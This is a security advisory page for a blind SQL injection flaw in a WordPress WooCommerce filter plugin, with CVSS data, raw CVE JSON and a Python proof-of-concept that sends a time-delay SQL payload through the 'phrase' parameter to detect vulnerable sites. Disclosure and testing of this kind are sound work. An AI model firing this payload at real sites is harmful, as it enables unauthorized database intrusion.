Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-11735 CVSS 7.5 HIGH

CVE-2025-11735

Published: 2025-10-28 06:15:39
Last Modified: 2026-04-15 00:35:42

Description

The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to blind SQL Injection via the `phrase` parameter in all versions up to, and including, 1.3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HUSKY Products Filter Professional for WooCommerce <= 1.3.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-11735 PoC - Blind SQL Injection # Target: HUSKY Products Filter Professional for WooCommerce # Vulnerability: phrase parameter SQL Injection def test_vulnerability(url): """Test if target is vulnerable to CVE-2025-11735""" # Normal request normal_payload = { 'phrase': 'test' } # Time-based blind SQL injection payload (MySQL) # Using SLEEP() to confirm SQL injection vulnerability sqli_payload = { 'phrase': "test' AND (SELECT * FROM (SELECT SLEEP(5))test) AND '1'='1" } print(f"[*] Testing target: {url}") try: # Send normal request print("[*] Sending normal request...") start = requests.get(url, params=normal_payload, timeout=10) # Send malicious request print("[*] Sending SQL injection payload...") import time start_time = time.time() response = requests.get(url, params=sqli_payload, timeout=30) elapsed = time.time() - start_time if elapsed >= 5: print(f"[+] VULNERABLE! Response delayed by {elapsed:.2f} seconds") print("[+] Target is affected by CVE-2025-11735") return True else: print(f"[-] Not vulnerable or target not affected") return False except requests.exceptions.Timeout: print("[+] VULNERABLE! Request timed out (expected behavior)") return True except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-11735-poc.py <target_url>") print("Example: python cve-2025-11735-poc.py http://example.com/wp-admin/admin-ajax.php") sys.exit(1) target_url = sys.argv[1] test_vulnerability(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11735", "sourceIdentifier": "[email protected]", "published": "2025-10-28T06:15:39.487", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to blind SQL Injection via the `phrase` parameter in all versions up to, and including, 1.3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-products-filter/trunk/ext/by_text_2/index.php#L164", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ebaec880-0d1c-4725-a746-530f48821279?source=cve", "source": "[email protected]"}]}}